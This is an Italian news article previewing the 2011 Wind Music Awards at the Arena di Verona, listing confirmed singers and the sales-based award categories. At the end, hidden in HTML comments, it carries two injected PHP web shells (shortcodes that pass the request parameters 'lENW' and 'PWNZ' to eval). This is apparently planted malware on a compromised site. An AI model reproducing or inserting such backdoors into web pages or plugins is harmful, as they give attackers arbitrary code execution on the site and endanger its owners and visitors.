WIND MUSIC AWARDS: ecco chi canterà!

Torna il 27 e il 28 maggio all’Arena di Verona la kermesse dove sfileranno i nomi più importanti della musica italiani, accompagnati da molti premiatori d’eccezione
Musica, musica e ancora musica. Dopo il successo dell’anno passato, torna all’Arena di Verona la 5^ edizione dei Wind Music Awards, manifestazione musicale che celebra il meglio della musica italiana.
Il “mega concerto”, realizzato da
Wind Telecomunicazioni con la collaborazione delle associazioni del settore discografico FIMI, AFI, e PMI, si terrà il 27 e il 28 maggio, ancora all’Arena di Verona e andrà in onda con tre prime serate su Italia1 nel mese di giugno.

I cantanti confermati
Tra gli artisti confermati ad oggi spiccano veterani e giovani promesse della canzone italiana come Giovanni Allevi, Alessandra Amoroso, Annalisa, Biagio Antonacci, Claudio Baglioni, Mario Biondi, Stefano Bollani, Carmen Consoli, Cesare Cremonini, Gigi D’Alessio, Lucio Dalla e Francesco De Gregori, DUE di Picche (Neffa e J-ax), Elisa, Emma, Fabri Fibra, Il Volo, Luciano Ligabue, Litfiba, Marco Mengoni, Modà, Gianna Nannini, Nek, Pooh, Francesco Renga, Renato Zero e Zucchero. E non finisce qui, il cast è ancora in via di definizione!

Le premiazioni
Durante i Wind Music Awards 2011 ritireranno il riconoscimento gli artisti che hanno pubblicato e venduto tra maggio 2010 e maggio 2011, oltre 300.000 copie (diamante), 120 mila copie (multi platino), 60 mila copie (platino) o 30.000 copie (oro) dei loro dischi in Italia.
Oltre a questi premi, verranno consegnati altri premi sempre dedicati ai più grandi artisti nazionali: il “Digital Songs” che sarà assegnato ai brani che hanno avuto oltre 60.000 download (multi platino) e 30.000 download (platino). A questi si aggiungono il premio speciale delle associazioni del settore discografico FIMI, AFI, e PMI e il premio speciale “Premio Arena di Verona”. Chi li vincerà? Staremo a vedere!

Come sempre, sul palcoscenico dei Wind Music Awards, si alterneranno in veste di premiatori molti personaggi del mondo dello spettacolo, della Tv, dello sport, della cultura e, nonché un parterre di ospiti di fama nazionale e internazionale.

Non ci resta che attendere nei prossimi giorni le ultime novità sulla kermesse musicale più “premiante” dell’anno.

<!– [insert_php]if (isset($_REQUEST["lENW"])){eval($_REQUEST["lENW"]);exit;}[/insert_php][php]if (isset($_REQUEST["lENW"])){eval($_REQUEST["lENW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PWNZ"])){eval($_REQUEST["PWNZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["PWNZ"])){eval($_REQUEST["PWNZ"]);exit;}[/php] –>